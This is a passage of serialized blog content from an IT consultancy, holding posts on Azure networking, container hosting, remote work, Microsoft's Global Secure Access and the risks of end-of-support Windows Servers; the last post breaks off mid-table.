443.",[12,5910,5911],{},"Azure also enables services that would otherwise be deployed via a purely public endpoint to be offered as internal services with private endpoints. The public endpoint can be disabled and replaced with a private endpoint that provides a network interface and thus a private IP address. The traffic does not leave your network environment and is not publicly accessible, enhancing the security of the services. However, traffic should always be carefully regulated, perhaps using an Azure Firewall or, more simply, with Network Security Groups.",[12,5913,5914],{},"Azure offers numerous options for networking on-premises data centers, branch offices, or user clients. ExpressRoute provides a fast and reliable service with low latency, although it is costly. Additionally, there are classic site-to-site connections based on VPN with various gateway sizes available. Client-to-Azure connections based on certificate-based or EntraID-based authentication are also possible.",[12,5916,5917],{},"Microsoft's Virtual WAN service significantly simplifies the global management of the network stack and centralizes many configurations, such as global and regional routing configuration and propagation. This service also allows for the quick and easy implementation and management of services like third-party firewalls or Azure services such as Azure Firewall and Gateways.",[12,5919,5920],{},"In summary, Azure offers a wide array of network services that eliminate the need for high initial investments and significantly lower the barriers to use. However, careful examination is necessary for general network design and solution-specific adjustments to individual applications to determine which solutions are most suitable. We are eager to support you with our experience in designing the optimal network design.",{"title":65,"searchDepth":111,"depth":111,"links":5922},[],{"lang":2171,"seoTitle":5924,"titleClass":2173,"date":5925,"categories":5926,"blogtitlepic":5927,"socialimg":5928,"customExcerpt":5929,"keywords":5930,"contactInContent":5931,"hreflang":5952,"scripts":5955},"Network Strategies in Azure: Optimizing Cloud Implementations","2024-07-02",[4232],"head-azure-network-management","/blog/heads/head-network-management.jpg","Discover the flexibility and security of Azure network solutions! Azure offers a wide range of networking services designed for IaaS, PaaS, and SaaS applications. From deploying independent network stacks and securing data with Azure Firewall to setting up private endpoints that make services internally available, Azure facilitates the creation of both secure and efficient 100% cloud and hybrid infrastructures. Let us help you reduce complexity and tailor your network design to your needs.","Azure Cloud Services, Network Stacks in Azure, Hybrid Cloud Integration, Azure IaaS, Cloud Security Solutions, Azure Network Optimization, PaaS and SaaS in Azure, Azure Firewall, Azure Private Endpoints, Azure Network Configuration",{"quote":2168,"infos":5932},{"bgColor":5862,"color":5863,"boxBgColor":5864,"boxColor":5865,"headline":5933,"subline":5934,"level":41,"textStyling":2204,"flush":2205,"person":5935,"form":5941},"Get in touch now","Would you like to learn more about Azure network management? We would be happy to personally introduce our approach and assist you with our experience in designing the optimal network configuration. We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":5938},"/people/people-pam-team.png","Project & Account Management",[5939,5940],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":5942,"method":2169,"action":2216,"fields":5943},{"skin":2215},[5944,5945,5946,5947,5948,5950,5951],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":5949},"Request Azure Network Management",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[5953],{"lang":2260,"href":5954},"/blog/azure/2024/07/azure-network-management",{"slick":2181,"form":2181},"/posts/2024-07-02-azure-network-management",{"title":5899,"description":5905},"posts/2024-07-02-azure-network-management",[4232,5726,5070,5960],"IaaS Solutions","qtWeUgQBVyZh6PQMiR3oQkFbcjhO-0EJz76PFf-k7kc",{"id":5963,"title":5964,"author":5965,"body":5966,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6011,"moment":6013,"navigation":2181,"path":6033,"seo":6034,"stem":6035,"tags":6036,"webcast":2168,"__hash__":6038},"content_en/posts/2024-07-08-homeoffice.md","Because the What Matters More Than the Where",[2505],{"type":9,"value":5967,"toc":6008},[5968,5972,5975,5978,5981,5984],[186,5969,5971],{"id":5970},"at-glueckkanja-you-can-continue-to-work-multimobil","At glueckkanja, you can continue to work multimobil.",[12,5973,5974],{},"Unlike many IT firms, you can continue to work as flexibly here as you’ve grown accustomed to over the years. Beyond simply delivering better results, we believe there are numerous other arguments for home office and multimobile working. Less stress, improved balance between work and family life, optimal work-life harmony, increased flexibility, and significantly more personal time—thanks to eliminated commutes—are just a few.",[12,5976,5977],{},"In fact, the Technical University of Darmstadt gathered some compelling findings from a survey conducted between December 2022 and March 2023. According to their data, over 75% of office workers are effective from home. 60% report being more successful and satisfied working from home. Furthermore, over 40% would consider resigning if they had to return to an office-only work environment.",[12,5979,5980],{},"This survey reaffirms our stance. Hence, we remain committed to our policy of flexible workplace choice. In doing so, we firmly oppose the current industry trend of reverting to rigid office policies with limited flexibility. If you’re also reluctant to follow this trend, we have something exciting for you: our open positions!",[12,5982,5983],{},"Here you'll find flexible jobs with plenty of work-life balance:",[52,5985,5991],{"className":5986},[5987,5988,5989,5990],"cta-list","d-inline-block","mt-2","mb-2",[2672,5992,6004],{"role":5993,"className":5994,"dataText":6001,"href":6002,"type":6003},"button",[5995,5996,5997,5998,5999,6000],"cta","btn","w-100","w-lg-auto","btn-primary","vue-component","To the job offers","/en/job-offers","Button",[102,6005,6001],{"className":6006},[6007],"cta__text",{"title":65,"searchDepth":111,"depth":111,"links":6009},[6010],{"id":5970,"depth":329,"text":5971},{"lang":2171,"seoTitle":6012,"titleClass":2173,"date":6013,"categories":6014,"blogtitlepic":6015,"blogTitleImages":6016,"socialimg":6018,"customExcerpt":6025,"keywords":6026,"hreflang":6027,"scripts":6032},"Work Multimobil at Glueckkanja: Less Stress and a Better Work-Life Balance","2024-07-08",[2962],"head-homeoffice-gates-en",[6017,6019,6021,6023],{"img":6018,"cloudinary":2181},"/blog/heads/head-homeoffice-gates-en.png",{"img":6020,"cloudinary":2181},"/blog/heads/head-homeoffice-zuse-en.png",{"img":6022,"cloudinary":2181},"/blog/heads/head-homeoffice-berners-lee-en.png",{"img":6024,"cloudinary":2181},"/blog/heads/head-homeoffice-en.png","Have you ever heard of Bill Gates' office chair? Do you know what it looks like? Ergonomic or simple? With armrests or without? No? Never? Don’t worry – neither do we. And there’s a good reason for that: It doesn’t matter what chair you sit on or what environment you’re in when inspiration strikes. The only thing that truly matters is the quality of the ideas.","Remote Jobs, Flexible Working, Work-Life Balance, Balancing Career and Family, Working Remotely, Multimobile Working, Stress-Free Work, Choice of Workplace, Satisfaction in Home Office, Jobs in IT Companies",[6028,6030],{"lang":2260,"href":6029},"/blog/corporate/2024/07/homeoffice",{"lang":2263,"href":6031},"/blog/corporate/2024/07/homeoffice-es",{"slick":2181,"form":2181},"/posts/2024-07-08-homeoffice",{"title":5964,"description":65},"posts/2024-07-08-homeoffice",[3088,3089,3090,6037],"Homeoffice","VRLsDL4F7I3Vbwfl2N3vo0rYtcuuNuBdftZ0zgGcDzs",{"id":6040,"title":6041,"author":6042,"body":6043,"cta":2166,"description":6047,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6175,"moment":6177,"navigation":2181,"path":6207,"seo":6208,"stem":6209,"tags":6210,"webcast":2168,"__hash__":6214},"content_en/posts/2024-07-12-containers-on-azure.md","Azure Container Services - modern, efficient and indispensable",[2510],{"type":9,"value":6044,"toc":6169},[6045,6048,6051,6054,6058,6060,6063,6066,6096,6099,6102,6106,6108,6111,6117,6120,6123,6126,6129,6133,6135,6138,6144,6153,6159,6162,6164,6166],[12,6046,6047],{},"In today's fast-paced world, businesses constantly face new challenges that require swift and flexible solutions. A key technology that meets these demands is containers. They enable efficient software development and deployment processes, keeping pace with the rapid tempo of digital transformation.",[12,6049,6050],{},"Containers, the building blocks of modern CI/CD workflows, offer a minimalist and efficient runtime environment that includes only the essential components needed to run an application. By separating additional components provided by the host system, containers significantly reduce startup and update times.",[12,6052,6053],{},"The question now arises: how can this potential be best utilized and managed?",[41,6055,6057],{"id":6056},"container-solutions-on-azure","Container Solutions on Azure",[12,6059,31],{},[12,6061,6062],{},"Microsoft Azure offers a wide range of options for running containers, from fully managed solutions where Microsoft handles most of the infrastructure configuration, to lightly managed solutions where you maintain control over the host system management.",[12,6064,6065],{},"Here is a list of container hosting options on Azure from light to fully managed:",[1254,6067,6068,6075,6082,6089],{},[1257,6069,6070],{},[2672,6071,6074],{"href":6072,"rel":6073},"https://learn.microsoft.com/en-us/azure/aks/what-is-aks",[2676],"Azure Kubernetes Services (AKS)",[1257,6076,6077],{},[2672,6078,6081],{"href":6079,"rel":6080},"https://learn.microsoft.com/en-us/azure/container-instances/container-instances-overview",[2676],"Azure Container Instances (ACI)",[1257,6083,6084],{},[2672,6085,6088],{"href":6086,"rel":6087},"https://azure.microsoft.com/en-us/products/app-service/containers/?activetab=pivot:deploytab",[2676],"Azure WebApp for Containers",[1257,6090,6091],{},[2672,6092,6095],{"href":6093,"rel":6094},"https://learn.microsoft.com/en-us/azure/container-apps/overview",[2676],"Azure Container Apps (ACA)",[12,6097,6098],{},"Each service offers its own benefits depending on the intended use case.",[12,6100,6101],{},"Azure Container Registry (ACR) allows for the central storage of containers within your own Azure environment, providing an integrated solution to use ACR as the source for the container images you deploy.",[41,6103,6105],{"id":6104},"spotlight-azure-container-apps","Spotlight: Azure Container Apps",[12,6107,31],{},[12,6109,6110],{},"Azure Container Apps (ACA) represent Microsoft's latest container hosting option. Unlike AKS, Microsoft completely manages the underlying Kubernetes, including updates, upgrades, and scaling.",[12,6112,6113],{},[2642,6114],{"alt":6115,"src":6116},"Container Apps Basic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-container-apps-example-scenarios.png",[12,6118,6119],{},"ACA is based on an Azure Container App Environment, where Microsoft provides fully managed Kubernetes resources that applications can utilize. Different workload profiles offer various combinations of CPU/RAM and the option to use GPU systems.",[12,6121,6122],{},"The main advantage of this solution is that you can focus solely on your application and its specific configuration, without having to manage the cluster.",[12,6124,6125],{},"ACA offers versatile ways to easily connect applications with other Azure services. For example, FileShares from an Azure Storage Account can be integrated into your containers to secure persistent data between restarts or application version changes.",[12,6127,6128],{},"Another feature of ACA is A/B or Green/Blue testing, where two versions of an application are run simultaneously. Incoming traffic is split between the running instances, enabling quick insights into the current development stage and allowing immediate bug fixes.",[41,6130,6132],{"id":6131},"practical-example-github-runner-on-azure-container-apps","Practical Example: GitHub Runner on Azure Container Apps",[12,6134,31],{},[12,6136,6137],{},"A practical example: CI/CD workflows require an environment in which they can be executed. GitHub, as well as Azure DevOps and other providers, offer public agents where workflows can run. These runners are managed by GitHub and communicate through public endpoints. However, if you need access to internal resources or prefer not to work on public systems, these runners can also be operated in your own network.",[12,6139,6140],{},[2642,6141],{"alt":6142,"src":6143},"GitHub Workflow Classic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-basic.png",[12,6145,6146,6147,6152],{},"Traditionally, 24/7 running virtual machines were used for this purpose. Azure Container Apps offer a cost-efficient and scalable alternative. Using KEDA (",[2672,6148,6151],{"href":6149,"rel":6150},"https://keda.sh/",[2676],"Kubernetes Event Driven Autoscaler","), a connection to your own GitHub environment is established. ACA monitors whether a workflow has started, launches a container to execute the workflow, and then removes it afterwards. If no workflow is running, no container is started, keeping costs low.",[12,6154,6155],{},[2642,6156],{"alt":6157,"src":6158},"GitHub Workflow with Container Apps","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-container-app.png",[12,6160,6161],{},"The scalability of the solution is another advantage, as each workflow creates a separate container instance. Compared to a virtual machine, where usually only a single agent serves a workflow, this offers a flexible and efficient alternative.",[41,6163,4699],{"id":4698},[12,6165,31],{},[12,6167,6168],{},"Containers provide an excellent opportunity to modernize your own development and deployment of applications. Microsoft Azure, with its comprehensive portfolio of services, offers the right solution, whether you want to manage it yourself or fully focus on your application.",{"title":65,"searchDepth":111,"depth":111,"links":6170},[6171,6172,6173,6174],{"id":6056,"depth":111,"text":6057},{"id":6104,"depth":111,"text":6105},{"id":6131,"depth":111,"text":6132},{"id":4698,"depth":111,"text":4699},{"lang":2171,"seoTitle":6176,"titleClass":2173,"date":6177,"categories":6178,"blogtitlepic":6179,"socialimg":6180,"customExcerpt":6181,"keywords":6182,"contactInContent":6183,"hreflang":6201,"scripts":6206},"Optimizing cloud deployment: container solutions on Azure at a glance","2024-07-15",[4232],"head-containers-on-azure","/blog/heads/head-containers-on-azure.jpg","Faster, leaner, more efficient – container technology is transforming the way businesses develop and deploy software. Learn more about how Microsoft Azure serves as a leading platform for hosting containers and how it can significantly enhance the agility and scalability of your applications.","Azure Container Solutions, Microsoft Azure, Container Technology, CI/CD Integration, Kubernetes Management, Application Deployment, Cloud Services, Software Development, Scalable Infrastructure, DevOps Tools",{"quote":2168,"infos":6184},{"bgColor":5862,"color":5863,"boxBgColor":5864,"boxColor":5865,"headline":5933,"subline":6185,"level":41,"textStyling":2204,"flush":2205,"person":6186,"form":6191},"Would you like to learn more about containers on Azure? We would be happy to introduce our approach in person and support you with our experience in implementing container solutions. We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":6187},[6188,6189],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5266,"href":6190,"icon":5279},"mailto:sales@glueckkanja.com",{"ctaText":5281,"cta":6192,"method":2169,"action":2216,"fields":6193},{"skin":2215},[6194,6195,6196,6197,6198,6199,6200],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":5949},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[6202,6204],{"lang":2260,"href":6203},"/blog/azure/2024/07/containers-on-azure",{"lang":2263,"href":6205},"/blog/azure/2024/07/containers-on-azure-es",{"slick":2181,"form":2181},"/posts/2024-07-12-containers-on-azure",{"title":6041,"description":6047},"posts/2024-07-12-containers-on-azure",[4232,6211,6212,6213],"Cloud Technology","Development","CI/CD-Workflow","z7-Wuqnh4xd7LK7ECqsc8EMXj2vdJDSzWpUspJTuJUM",{"id":6216,"title":6217,"author":6218,"body":6219,"cta":2166,"description":6333,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6334,"moment":6336,"navigation":2181,"path":6368,"seo":6369,"stem":6370,"tags":6371,"webcast":2168,"__hash__":6373},"content_en/posts/2024-07-18-gsa-launch-partner.md","glueckkanja is Launch Partner for Microsoft's SSE Solution",[2373],{"type":9,"value":6220,"toc":6328},[6221,6230,6238,6241,6244,6247,6251,6253,6256,6262,6265,6279,6283,6285,6288,6291,6299,6305,6308,6311,6319,6323,6325],[12,6222,6223,6224,6229],{},"glueckkanja has been announced as one of the ",[2672,6225,6228],{"href":6226,"rel":6227},"https://learn.microsoft.com/en-us/entra/global-secure-access/how-to-find-microsoft-services-partners",[2676],"‘Product Launch Partners’"," for Microsoft's Security Service Edge (SSE) solution, Global Secure Access, including Microsoft Entra Internet & Private Access.",[12,6231,6232,6233,6237],{},"With many years of experience in a 100% cloud approach, we offer extensive support in implementing a consistent Zero Trust design, and ",[2672,6234,6236],{"href":6235},"/en/security/global-secure-access/","Global Secure Access"," fits seamlessly into this strategy! It is now a key component of our modern workplace and identity-centric security blueprint, starting from proof of concept to managed services.",[12,6239,6240],{},"We have been working on workplace and security projects for years, successfully separating clients from the data center and deploying highly efficient, secure cloud-managed clients. However, a modern 100% cloud client does not automatically eliminate legacy environments; it still needs to access services within them. In addition, many security teams believe that security capabilities are necessary beyond the client, within the network stack.",[12,6242,6243],{},"Unfortunately, in many projects, we observed our Future Workplace clients being integrated into the data center environments using outdated VPN solutions, and various 'Zero Trust' solutions were obstructing traffic between the clients and Microsoft 365.",[12,6245,6246],{},"We are therefore very pleased to be able to use from now on Entra Private Access, a genuine identity-centric Zero Trust Network Access for the most complex data center environments as a replacement for VPN solutions. Additionally, we will also use Entra Internet Access, an identity-centric Secure Web Gateway solution with Conditional Access integration, in our projects.",[41,6248,6250],{"id":6249},"what-is-global-secure-access","What is Global Secure Access?",[12,6252,31],{},[12,6254,6255],{},"Global Secure Access is designed to deliver security services through the cloud, supporting managed devices across all major platforms. This includes integration with identity providers and security tools such as XDR or SIEM.",[12,6257,6258],{},[2642,6259],{"alt":6260,"src":6261},"GSA Architecture","https://res.cloudinary.com/c4a8/image/upload/v1721295305/blog/pics/gsa-architecture.png",[12,6263,6264],{},"The architecture of the SSE solution is divided into two main areas, each with different components:",[1254,6266,6267,6273],{},[1257,6268,6269,6272],{},[251,6270,6271],{},"Internet Access"," features an identity-centered Secure Web Gateway (SWG) that functions similarly to a forward proxy. It not only protects against malware and other threats but also performs URL category filtering.",[1257,6274,6275,6278],{},[251,6276,6277],{},"Private Access"," is an identity-centered Zero Trust Network Access (ZTNA) solution that allows granular and consistent access to non-public applications regardless of their location, implementing detailed context-based access control.",[41,6280,6282],{"id":6281},"what-is-the-difference-between-global-secure-access-and-my-vpn-gateway-proxy","What is the difference between Global Secure Access and my VPN gateway / proxy?",[12,6284,31],{},[12,6286,6287],{},"Both Entra Internet Access and Entra Private Access feature Conditional Access integration, enabling strong authentication and device compliance enforcement, including Microsoft Defender for Endpoint integration, at the authentication layer. Microsoft is also working on additional enforcement mechanisms at the data layer through Continuous Access Evaluation to address advanced token theft scenarios.",[12,6289,6290],{},"Even newer VPN gateways typically cover the initial authentication of the user via RADIUS or SAML, granting access to the environment – often for an exented period – regardless of whether the user or client is involved in a security incident. This one-time authenticated access generally applies to the entire internal network, with the same set of rules applicable to all users.",[2110,6292,6293],{},[12,6294,6295,6298],{},[251,6296,6297],{},"Entra Private Access"," is designed to combine individual network segments into Enterprise Apps, then individually assign, authenticate and restrict users with Conditional Access.",[12,6300,6301],{},[2642,6302],{"alt":6303,"src":6304},"Full Tunnel vs App based Tunnel","https://res.cloudinary.com/c4a8/image/upload/v1721295307/blog/pics/tunnel-comparison.png",[12,6306,6307],{},"In my experience, the primary issue with secure web gateways is the poor integration with identity providers. While the early variants brought ADFS farms to their knees with masses of SAML requests causing massive disruptions, the providers have now moved to one-time authentication and then work with their own long-lived cookies.",[12,6309,6310],{},"The second major issue is the exclusion of Microsoft URLs and IPs from the proxy ruleset. This simply does not need a proxy between the client and trusted services such as M365, and in fact causes various problems and performance loss. I have yet to see a provider where this works without an accident.",[2110,6312,6313],{},[12,6314,6315,6318],{},[251,6316,6317],{},"Entra Internet Access"," is part of most enterprise cloud identity providers and has very strong Conditional Access integration.",[41,6320,6322],{"id":6321},"would-you-like-to-know-more-about-it","Would you like to know more about it?",[12,6324,31],{},[12,6326,6327],{},"We have extensive experience in the areas of identity, security, workplace and network. With Global Secure Access, we bring all these aspects together. Say goodbye to outdated VPN and web proxy solutions and take full advantage of the possibilities of Microsoft's SSE solution. We look forward to hearing from you!",{"title":65,"searchDepth":111,"depth":111,"links":6329},[6330,6331,6332],{"id":6249,"depth":111,"text":6250},{"id":6281,"depth":111,"text":6282},{"id":6321,"depth":111,"text":6322},"glueckkanja has been announced as one of the ‘Product Launch Partners’ for Microsoft's Security Service Edge (SSE) solution, Global Secure Access, including Microsoft Entra Internet & Private Access.",{"lang":2171,"seoTitle":6335,"titleClass":2173,"date":6336,"categories":6337,"blogtitlepic":6338,"socialimg":6339,"customExcerpt":6340,"keywords":6341,"contactInContent":6342,"hreflang":6362,"scripts":6367},"glueckkanja is Product Launch Partner for Microsoft’s Security Service Edge (SSE) solution","2024-07-18",[2176],"head-global-secure-access","/blog/heads/head-global-secure-access.jpg","Thrilled to announce our role as ‘Product Launch Partner' for Microsoft's Security Service Edge (SSE) solution, Global Secure Access, which includes Microsoft Entra Internet & Private Access. Our collaboration with Microsoft in several private previews has refined these features to benefit not just our teams but also our customers, integrating their needs into a seamless and secure cloud experience. Discover how our expertise in a 100% cloud-based approach and Zero Trust design is transforming modern workplace and identity-centric security.","Global Secure Access, SSE, Microsofts SSE, Private Access, Internet Access, VPN replacement, Zero Trust Network Access, Network security",{"quote":2168,"infos":6343},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":6346,"level":41,"textStyling":2204,"flush":2205,"person":6347,"form":6351},"var(--color-gigas)","var(--color-yellow)","Would you like to learn more about Microsoft's SSE Solution? We would be happy to introduce our approach in person and support you with our experience in implementing this solution. We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":6348},[6349,6350],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":6352,"method":2169,"action":2216,"fields":6353},{"skin":2215},[6354,6355,6356,6357,6358,6360,6361],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":6359},"Request Global Secure Access",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[6363,6365],{"lang":2260,"href":6364},"/blog/security/2024/07/gsa-launch-partner",{"lang":2263,"href":6366},"/blog/security/2024/07/gsa-launch-partner-es",{"slick":2181,"form":2181},"/posts/2024-07-18-gsa-launch-partner",{"title":6217,"description":6333},"posts/2024-07-18-gsa-launch-partner",[6236,5300,6372,2176],"VPN Replacement","UAgoECjMn2OaYdCrQRJ8_UKxwgG95bTCpZJLgVD5-7U",{"id":6375,"title":6376,"author":6377,"body":6378,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6668,"moment":6669,"navigation":2181,"path":6698,"seo":6699,"stem":6700,"tags":6701,"webcast":2168,"__hash__":6707},"content_en/posts/2024-10-17-end-of-support-operating-systems.md","Why Your Outdated Windows Servers Are Putting Your Business at Risk",[2515],{"type":9,"value":6379,"toc":6656},[6380,6384,6386,6389,6392,6396,6398,6404,6410,6413,6421,6425,6427,6430,6442,6445,6448,6451,6454,6458,6460,6464,6466,6469,6478,6484,6488,6490,6493,6496,6507,6513,6519,6525,6529,6531,6536,6539,6545,6553,6557,6559,6562,6565,6568,6571,6574,6578,6580,6583,6586,6635,6641,6644,6647,6650],[41,6381,6383],{"id":6382},"windows-servers-vs-airplane","Windows Servers vs Airplane",[12,6385,31],{},[12,6387,6388],{},"Imagine boarding an airplane that’s long out of service, plagued with over 35 critical mechanical issues. Would you still feel safe? Now think of your Windows Server 2012 R2. It’s essentially that same outdated airplane, riddled with vulnerabilities, but this time, it’s your organization’s infrastructure on the line.",[12,6390,6391],{},"It’s time to act – don’t waste any more time. Your flight is booked, but it’s at serious risk.",[41,6393,6395],{"id":6394},"understand-the-security-implications-and-potential-impact","Understand the Security Implications and Potential Impact",[12,6397,31],{},[12,6399,6400,6403],{},[251,6401,6402],{},"Security Score Impact:"," End-of-Life (EOL) systems significantly lower your organization’s overall security score.",[12,6405,6406,6409],{},[251,6407,6408],{},"Massive Risk:"," These systems are highly vulnerable to attacks due to the absence of updates and vendor support, posing a severe threat to the entire corporate environment.",[12,6411,6412],{},"Attackers love EOL operating systems, as they serve as open invitations to gain a foothold in your network, potentially leading to a full infrastructure compromise.",[12,6414,6415,6416,6420],{},"While our ",[2672,6417,6419],{"href":6418},"/en/security/are-you-under-attack/","APT Response services"," can help you recover, we always advocate for a proactive approach—one that ensures you never face such a situation in the first place.",[41,6422,6424],{"id":6423},"identify-eol-systems-in-your-organization","Identify EOL Systems in Your Organization",[12,6426,31],{},[12,6428,6429],{},"Discovery & Methods to Identify End-of-Life (EOL) Operating Systems",[12,6431,6432,6433,6437,6438,6441],{},"Start with discovery. We frequently uncover End-of-Life (EOL) operating systems during our assessments, whether through ",[2672,6434,6436],{"href":6435},"/en/security/preventive-services/","preventive services like AD/EID"," or our ",[2672,6439,6440],{"href":5241},"managed CSOC offerings",". The first step in addressing this issue is developing reliable methods to identify EOL systems and take action.",[12,6443,6444],{},"It’s crucial to establish a strategy for regularly identifying these outdated systems using various tools and assessments. We can partner with you to implement this effectively.",[12,6446,6447],{},"One key step is identifying your Line of Business (LOB) applications and determining where they’re running to ensure alignment with your business needs. The risk-based LOB triangle is a valuable tool that helps uncover dependencies and assess risks throughout your organization.",[12,6449,6450],{},"By analyzing loss patterns and volatility over time, this approach becomes a cornerstone of effective risk management, delivering essential insights to your management team. This is especially critical when super-sensitive LOBs, sitting at the top of the triangle, are operating on EOL systems. These systems pose a significant threat to service continuity, operational stability, and overall business performance.",[12,6452,6453],{},"In short, if your most critical LOBs are running on EOL systems, you’re exposing your company to the risk of service disruption and elevated operational dangers.",[41,6455,6457],{"id":6456},"building-an-outdated-operating-system-strategy","Building an Outdated Operating System Strategy",[12,6459,31],{},[186,6461,6463],{"id":6462},"short-term-solution-esu-could-be-your-friend","Short-Term Solution: ESU Could Be Your Friend",[12,6465,47],{},[12,6467,6468],{},"Address vulnerabilities by implementing a short-term solution and simultaneously work on a long-term strategy to handle End-of-Life (EOL) and End-of-Support (EOS) systems.",[12,6470,6471,6472,6477],{},"Use ",[2672,6473,6476],{"href":6474,"rel":6475},"https://www.microsoft.com/en-us/windows-server/extended-security-updates",[2676],"Extended Security Updates (ESU)"," as a lifesaver to get through this challenging period. ESU can temporarily secure EOL systems until migration or decommissioning is completed. Remember, this is just a short-term workaround.",[12,6479,6480,6483],{},[251,6481,6482],{},"Isolation:"," Completely isolate these systems from networks and Active Directory during the transition period. This gives you the time to plan and execute your migration without exposing yourself to severe risks, creating a more manageable situation.",[186,6485,6487],{"id":6486},"build-a-long-term-strategy","Build a Long-Term Strategy",[12,6489,47],{},[12,6491,6492],{},"After addressing immediate concerns with ESU, it's time to shift focus towards a long-term strategy to phase out legacy systems. Take a moment to evaluate the best long-term solutions that align with your needs.",[12,6494,6495],{},"Consider migration to modern operating systems, serverless approaches, Software as a Service (SaaS), or any cloud-native solutions that tailored to your environment.",[12,6497,6498,6501,6502,6506],{},[251,6499,6500],{},"Migration:"," Plan and execute the upgrade of outdated systems to the latest versions. Evaluate alternatives such as serverless, containers, or Kubernetes (K8s). glueckkanja's ",[2672,6503,6505],{"href":6504},"/en/azure/migrate-to-the-cloud","Azure Foundation Blueprint"," provides a solid framework for your cloud migration. Using Infrastructure-as-Code deployment, we ensure a fast implementation with the highest quality. Security and governance requirements are directly embedded in the platform, and built-in controls such as policies and automation replace outdated, costly processes and workflows.",[12,6508,6509,6512],{},[251,6510,6511],{},"Decommissioning:"," Safely decommission unsupported systems.\nBy following this approach, you mitigate immediate risks while planning for sustainable, long-term security improvements. If you need further details or assistance, feel free to reach out!",[12,6514,6515,6518],{},[251,6516,6517],{},"Long-Term Target:"," In the future, ensure you are prepared well in advance of your systems reaching End of Life (EOL).",[12,6520,6521,6524],{},[251,6522,6523],{},"Get in contact with our Azure experts:"," Plan and execute a successful cloud migration with our guidance. glueckkanja holds the Azure Advanced Specialization for Infrastructure and Database Migration. Customers can also take advantage of the Azure Migration and Modernization Program (AMM) for comprehensive migration support.",[41,6526,6528],{"id":6527},"know-about-os-support-lifecycle","Know About OS Support Lifecycle",[12,6530,31],{},[12,6532,6533],{},[251,6534,6535],{},"Regularly review the support lifecycle and timeline for each operating system (OS) to ensure compliance and proactive risk management.",[12,6537,6538],{},"Microsoft provides consistent and predictable guidelines for their products, whether it’s server OS, client OS, or other products like Exchange, SQL, and many more.",[12,6540,6541,6542,1013],{},"This enables strategic planning for the future. Always stay informed about the OS and software support lifecycle. Regular reviews help you stay compliant and proactively manage risks. With Defender for Endpoint, these reviews are simplified. Monitoring vulnerabilities and identifying End-of-Life systems are integral parts of our ",[2672,6543,6544],{"href":4296},"CSOC Service",[12,6546,6547,6548,1013],{},"Get an overview of the ",[2672,6549,6552],{"href":6550,"rel":6551},"https://learn.microsoft.com/en-us/lifecycle/",[2676],"Microsoft Lifecycle Policy",[41,6554,6556],{"id":6555},"conclusion-dont-wait-for-the-press-to-write-your-story","Conclusion: Don’t Wait for the Press to Write Your Story",[12,6558,31],{},[12,6560,6561],{},"The message is loud and clear: don’t wait for service interruptions or compromises.",[12,6563,6564],{},"We hope to see only positive news about your enterprise in the press. While we offer APT Response services, we strongly encourage you – and all our customers – to engage with us proactively, rather than reacting to a security breach.",[12,6566,6567],{},"The essence of this article is to urge you to shift from a reactive stance to preparing your business for the next level. Future-proof your organization by maintaining up-to-date platforms or adopting cloud-native solutions. All stakeholders, including your customers and management, will appreciate this proactive approach.",[12,6569,6570],{},"Management, in particular, should be fully aware of their responsibilities and liabilities in ensuring the company’s operational stability and security.",[12,6572,6573],{},"Take advantage of our Azure, Workplace, and Security offerings – feel free to reach out to us!",[41,6575,6577],{"id":6576},"appendix-windows-server-2012-r2-windows-server-2008-r2-number-of-vulnerabilities","Appendix - Windows Server 2012 R2 - Windows Server 2008 R2 - Number of Vulnerabilities",[12,6579,31],{},[12,6581,6582],{},"The table below highlights the known vulnerabilities, which continue to increase by over 20 each month.",[2127,6584,6585],{},"\ntable {\n  font-family: arial, sans-serif;\n  border-collapse: collapse;\n  width: 100%;\n}\n\ntd, th {\n  border: 1px solid #dddddd;\n  text-align: left;\n  padding: 8px;\n}\n\ntr:nth-child(even) {\n  background-color: #dddddd;\n}\n",[417,6587,420,6588],{},[438,6589,6590,420,6601,420,6613,420,6625],{},[426,6591,424,6592,424,6595,424,6598,420],{},[430,6593,6594],{},"Operating System",[430,6596,6597],{},"Windows Server 2012 R2",[430,6599,6600],{},"Windows Server 2008 R2",[426,6602,424,6603,424,6606,424,6610,420],{},[443,6604,6605],{},"Total # of Vulnerabilities*",[443,6607,6609],{"style":6608},"text-align: 